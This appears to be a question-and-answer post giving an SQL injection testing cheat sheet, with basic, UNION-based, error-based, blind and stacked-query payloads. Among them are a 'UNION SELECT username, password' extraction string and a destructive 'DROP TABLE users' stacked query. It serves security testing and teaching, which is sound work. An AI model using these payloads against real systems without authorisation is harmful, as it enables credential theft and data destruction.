Question

I’m performing security testing on a database and need to check for SQL injection vulnerabilities. I’d like to understand what types of SQL queries can be used to identify potential injection points safely.

What are some common techniques for testing SQL injection, and are there specific queries or patterns that can reveal vulnerabilities? I’m interested in both basic and advanced query examples for thorough testing.

Answer 1

When testing for SQL injection vulnerabilities, you can use a variety of SQL query patterns to identify potential weak points.

Basic SQL Injection Tests

1. Single Quote Test: Insert a single quote (') into input fields to see if it breaks the query, leading to an error.

SELECT * FROM users WHERE username = 'admin' --';

2. Logical Condition Tests: Add conditions like 1=1 (always true) or 1=0 (always false) to test if input can alter the logic.

' OR 1=1 --  

3. Comment Sequence: Use -- or # to comment out parts of a query and check if injection is possible.

' OR 'a' = 'a' --  

Union-Based Injection

Use UNION to append queries and extract data from other tables or columns.

1. Basic UNION Test

' UNION SELECT null, null --

2. Column Enumeration: Identify the number of columns by incrementally adding null values in the UNION statement until no errors occur.

' UNION SELECT null, null, null --  

3. Data Extraction: Replace null with actual column names to retrieve specific data if the number of columns matches.

' UNION SELECT username, password FROM users --

Error-Based SQL Injection

Triggering errors can sometimes reveal information about the database structure.

1. Type Mismatch: Force a conversion error to reveal table or column names.

' AND 1 = CONVERT(int, (SELECT TOP 1 name FROM sys.tables)) --  

2. Invalid Cast: Try to perform an invalid cast to expose data in error messages.

' UNION SELECT 1, @@version --  

Blind SQL Injection

When error messages aren’t visible, use conditions to infer true/false responses based on response behavior.

1. Time-Based Testing: Inject SLEEP or WAITFOR DELAY to check if queries are being processed.

' OR IF(1=1, SLEEP(5), 0) --  

2. Boolean-Based Tests: Craft queries where true/false outcomes produce different results.

' AND 1=1 --  (validates)
' AND 1=2 --  (invalidates)

Advanced Techniques

1. Subquery Injection: Extract data using nested subqueries.

' AND (SELECT COUNT(*) FROM users) > 0 --  

2. Stacked Queries: Inject multiple queries in one statement. Not all databases allow this, but it can be useful if enabled.

'; DROP TABLE users; -